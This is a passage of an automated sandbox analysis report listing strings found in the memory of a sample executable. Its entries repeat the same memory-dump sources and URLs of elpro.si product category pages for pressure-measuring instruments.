                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/kontaktni-manometri-2/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/merilni-pretvorniki-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/montazni-pribor-za-merilnike-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/procesni-pretvorniki-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/rotronic-merilniki-diferencialnega-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/sistemi-tlacnih-vmesnikov/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacna-stikala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 